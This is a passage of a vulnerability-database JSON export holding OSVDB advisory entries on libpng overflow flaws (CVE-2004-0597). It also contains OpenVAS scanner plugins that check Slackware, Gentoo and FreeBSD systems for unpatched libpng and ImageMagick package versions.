ID:12810](https://secuniaresearch.flexerasoftware.com/advisories/12810/)\n[Secunia Advisory ID:13341](https://secuniaresearch.flexerasoftware.com/advisories/13341/)\n[Secunia Advisory ID:22958](https://secuniaresearch.flexerasoftware.com/advisories/22958/)\n[Secunia Advisory ID:12221](https://secuniaresearch.flexerasoftware.com/advisories/12221/)\n[Secunia Advisory ID:12219](https://secuniaresearch.flexerasoftware.com/advisories/12219/)\n[Secunia Advisory ID:12223](https://secuniaresearch.flexerasoftware.com/advisories/12223/)\n[Secunia Advisory ID:12232](https://secuniaresearch.flexerasoftware.com/advisories/12232/)\n[Secunia Advisory ID:12240](https://secuniaresearch.flexerasoftware.com/advisories/12240/)\n[Secunia Advisory ID:12248](https://secuniaresearch.flexerasoftware.com/advisories/12248/)\n[Secunia Advisory ID:15432](https://secuniaresearch.flexerasoftware.com/advisories/15432/)\n[Secunia Advisory ID:17645](https://secuniaresearch.flexerasoftware.com/advisories/17645/)\n[Secunia Advisory ID:22957](https://secuniaresearch.flexerasoftware.com/advisories/22957/)\n[Secunia Advisory ID:12220](https://secuniaresearch.flexerasoftware.com/advisories/12220/)\n[Secunia Advisory ID:12234](https://secuniaresearch.flexerasoftware.com/advisories/12234/)\n[Secunia Advisory ID:12249](https://secuniaresearch.flexerasoftware.com/advisories/12249/)\n[Secunia Advisory ID:12283](https://secuniaresearch.flexerasoftware.com/advisories/12283/)\n[Secunia Advisory ID:12354](https://secuniaresearch.flexerasoftware.com/advisories/12354/)\n[Secunia Advisory ID:13291](https://secuniaresearch.flexerasoftware.com/advisories/13291/)\n[Related OSVDB ID: 8313](https://vulners.com/osvdb/OSVDB:8313)\n[Related OSVDB ID: 8326](https://vulners.com/osvdb/OSVDB:8326)\n[Related OSVDB ID: 8314](https://vulners.com/osvdb/OSVDB:8314)\n[Related OSVDB ID: 8315](https://vulners.com/osvdb/OSVDB:8315)\n[Related OSVDB ID: 8316](https://vulners.com/osvdb/OSVDB:8316)\nRedHat RHSA: RHSA-2004:402-08\nRedHat 
RHSA: RHSA-2004:421-17\nOther Advisory URL: http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:082\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200408-22.xml\nOther Advisory URL: http://www4.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBTU01063\nOther Advisory URL: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57617\nOther Advisory URL: http://sunsolve.sun.com/search/document.do?assetkey=1-26-57683-1\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.25/SCOSA-2005.25.txt\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2004.16/SCOSA-2004.16.txt\nMicrosoft Security Bulletin: MS05-009\nMicrosoft Knowledge Base Article: 890261\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-08/0026.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-02/0034.html\nKeyword: SCOSA-2005.49\nISS X-Force ID: 10925\nISS X-Force ID: 19252\n[CVE-2004-0597](https://vulners.com/cve/CVE-2004-0597)\nCIAC Advisory: o-192\nCERT VU: 388984\nCERT VU: 817368\n", "modified": "2004-08-04T00:00:00", "published": "2004-08-04T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:8312", "id": "OSVDB:8312", "type": "osvdb", "title": "libpng png_handle_sBIT() Local Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "cvelist": ["CVE-2004-0597"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in libpng. The library function png_handle_tRNS fails to perform a length check on PNG images resulting in a buffer overflow. With a specially crafted PNG file, an attacker can cause the execution of code resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 1.2.6 release candidate 1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. 
Users of the older 1.0 series should upgrade to libpng-1.0.16 release candidate 1 or higher.\n## Short Description\nA remote overflow exists in libpng. The library function png_handle_tRNS fails to perform a length check on PNG images resulting in a buffer overflow. With a specially crafted PNG file, an attacker can cause the execution of code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.imagemagick.org/\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=61798)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:213)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.49/SCOSA-2005.49.txt)\n[Vendor Specific Advisory URL](http://www.suse.de/de/security/2004_23_libpng.html)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:079)\n[Vendor Specific Advisory URL](http://www.redhat.com/archives/fedora-announce-list/2004-August/msg00006.html)\n[Vendor Specific Advisory URL](http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000564)\n[Vendor Specific Advisory URL](http://bugzilla.mozilla.org/show_bug.cgi?id=251381)\n[Vendor Specific Advisory URL](http://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00139.html)\n[Vendor Specific Advisory URL](http://www.redhat.com/archives/fedora-announce-list/2004-August/msg00005.html)\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200408-03.xml)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:212)\nUS-CERT Cyber Security Alert: TA04-217A\nSecurity Tracker: 1010854\n[Secunia Advisory ID:12222](https://secuniaresearch.flexerasoftware.com/advisories/12222/)\n[Secunia Advisory ID:12810](https://secuniaresearch.flexerasoftware.com/advisories/12810/)\n[Secunia Advisory 
ID:13341](https://secuniaresearch.flexerasoftware.com/advisories/13341/)\n[Secunia Advisory ID:22958](https://secuniaresearch.flexerasoftware.com/advisories/22958/)\n[Secunia Advisory ID:12219](https://secuniaresearch.flexerasoftware.com/advisories/12219/)\n[Secunia Advisory ID:12221](https://secuniaresearch.flexerasoftware.com/advisories/12221/)\n[Secunia Advisory ID:12223](https://secuniaresearch.flexerasoftware.com/advisories/12223/)\n[Secunia Advisory ID:12232](https://secuniaresearch.flexerasoftware.com/advisories/12232/)\n[Secunia Advisory ID:12240](https://secuniaresearch.flexerasoftware.com/advisories/12240/)\n[Secunia Advisory ID:12248](https://secuniaresearch.flexerasoftware.com/advisories/12248/)\n[Secunia Advisory ID:15432](https://secuniaresearch.flexerasoftware.com/advisories/15432/)\n[Secunia Advisory ID:17645](https://secuniaresearch.flexerasoftware.com/advisories/17645/)\n[Secunia Advisory ID:22957](https://secuniaresearch.flexerasoftware.com/advisories/22957/)\n[Secunia Advisory ID:12220](https://secuniaresearch.flexerasoftware.com/advisories/12220/)\n[Secunia Advisory ID:12234](https://secuniaresearch.flexerasoftware.com/advisories/12234/)\n[Secunia Advisory ID:12249](https://secuniaresearch.flexerasoftware.com/advisories/12249/)\n[Secunia Advisory ID:12283](https://secuniaresearch.flexerasoftware.com/advisories/12283/)\n[Secunia Advisory ID:12354](https://secuniaresearch.flexerasoftware.com/advisories/12354/)\n[Secunia Advisory ID:13291](https://secuniaresearch.flexerasoftware.com/advisories/13291/)\n[Related OSVDB ID: 8313](https://vulners.com/osvdb/OSVDB:8313)\n[Related OSVDB ID: 8312](https://vulners.com/osvdb/OSVDB:8312)\n[Related OSVDB ID: 8314](https://vulners.com/osvdb/OSVDB:8314)\n[Related OSVDB ID: 8315](https://vulners.com/osvdb/OSVDB:8315)\n[Related OSVDB ID: 8316](https://vulners.com/osvdb/OSVDB:8316)\nRedHat RHSA: RHSA-2004-421\nRedHat RHSA: RHSA-2004:402-08\nOther Advisory URL: 
http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:082\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200408-22.xml\nOther Advisory URL: http://scary.beasts.org/security/CESA-2004-001.txt\nOther Advisory URL: http://www4.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBTU01063\nOther Advisory URL: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57617\nOther Advisory URL: http://sunsolve.sun.com/search/document.do?assetkey=1-26-57683-1\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.25/SCOSA-2005.25.txt\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2004.16/SCOSA-2004.16.txt\nMicrosoft Security Bulletin: MS05-009\nMicrosoft Knowledge Base Article: 890261\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-08/0026.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-02/0034.html\nKeyword: SCOSA-2005.49\nISS X-Force ID: 10925\nISS X-Force ID: 19252\n[CVE-2004-0597](https://vulners.com/cve/CVE-2004-0597)\nCIAC Advisory: o-192\nCERT VU: 388984\nCERT VU: 817368\n", "modified": "2004-08-04T00:00:00", "published": "2004-08-04T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:8326", "id": "OSVDB:8326", "type": "osvdb", "title": "libpng png_handle_tRNS Remote Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-24T12:51:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2004-222-01.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:53920", "href": "http://plugins.openvas.org/nasl.php?oid=53920", "type": "openvas", "title": "Slackware Advisory SSA:2004-222-01 libpng", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2004_222_01.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: 
Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New libpng packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\nand -current to fix security issues. 
These issues could cause program crashes,\nor possibly allow arbitrary code embedded in a malicious PNG image to execute.\nThe PNG library is widely used within the system, so all sites should upgrade\nto the new libpng package.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2004-222-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2004-222-01\";\n \nif(description)\n{\n script_id(53920);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2004-0597\", \"CVE-2004-0598\", \"CVE-2004-0599\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2004-222-01 libpng \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.5-i386-1\", rls:\"SLK8.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.5-i486-3\", rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.5-i486-3\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.5-i486-3\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2004-222-01.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231053920", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231053920", "type": "openvas", "title": "Slackware Advisory SSA:2004-222-01 libpng", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2004_222_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.53920\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2004-0597\", \"CVE-2004-0598\", \"CVE-2004-0599\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2004-222-01 libpng\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(8\\.1|9\\.0|9\\.1|10\\.0)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2004-222-01\");\n\n script_tag(name:\"insight\", value:\"New libpng packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\nand -current to fix security issues. These issues could cause program crashes,\nor possibly allow arbitrary code embedded in a malicious PNG image to execute.\nThe PNG library is widely used within the system, so all sites should upgrade\nto the new libpng package.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2004-222-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.5-i386-1\", rls:\"SLK8.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.5-i486-3\", rls:\"SLK9.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.5-i486-3\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"libpng\", ver:\"1.2.5-i486-3\", rls:\"SLK10.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:50:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "The remote host is missing an update as 
announced\nvia advisory SSA:2004-223-02.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:53918", "href": "http://plugins.openvas.org/nasl.php?oid=53918", "type": "openvas", "title": "Slackware Advisory SSA:2004-223-02 imagemagick", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2004_223_02.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New imagemagick packages are available for Slackware 9.1, 10.0,\nand -current to fix security issues with PNG images.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2004-223-02.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2004-223-02\";\n \nif(description)\n{\n script_id(53918);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2004-0597\", \"CVE-2004-0598\", \"CVE-2004-0599\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2004-223-02 imagemagick \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"imagemagick\", ver:\"5.5.7_25-i486-1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"imagemagick\", ver:\"6.0.4_3-i486-1\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2004-223-02.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231053918", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231053918", "type": "openvas", "title": "Slackware Advisory SSA:2004-223-02 imagemagick", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2004_223_02.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.53918\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2004-0597\", \"CVE-2004-0598\", \"CVE-2004-0599\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2004-223-02 imagemagick\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(9\\.1|10\\.0)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2004-223-02\");\n\n script_tag(name:\"insight\", value:\"New imagemagick packages are available for Slackware 9.1, 10.0,\nand -current to fix security issues with PNG images.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2004-223-02.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"imagemagick\", ver:\"5.5.7_25-i486-1\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"imagemagick\", ver:\"6.0.4_3-i486-1\", rls:\"SLK10.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:50:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200408-03.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:54633", "href": "http://plugins.openvas.org/nasl.php?oid=54633", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200408-03 (libpng)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke 
<reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"libpng contains numerous vulnerabilities potentially allowing an attacker\nto perform a Denial of Service attack or even execute arbitrary code.\";\ntag_solution = \"All libpng users should upgrade to the latest stable version:\n\n # emerge sync\n\n # emerge -pv '>=media-libs/libpng-1.2.5-r8'\n # emerge '>=media-libs/libpng-1.2.5-r8'\n\nYou should also run revdep-rebuild to rebuild any packages that depend on\nolder versions of libpng :\n\n # revdep-rebuild\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200408-03\nhttp://bugs.gentoo.org/show_bug.cgi?id=59424\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200408-03.\";\n\n \n\nif(description)\n{\n script_id(54633);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2004-0597\", \"CVE-2004-0598\", \"CVE-2004-0599\");\n 
script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200408-03 (libpng)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"media-libs/libpng\", unaffected: make_list(\"ge 1.2.5-r8\"), vulnerable: make_list(\"le 1.2.5-r7\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-20T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:52430", "href": "http://plugins.openvas.org/nasl.php?oid=52430", "type": "openvas", "title": "FreeBSD Ports: ImageMagick, ImageMagick-nox11", "sourceData": "#\n#VID a713c0f9-ec54-11d8-9440-000347a4fa7d\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 
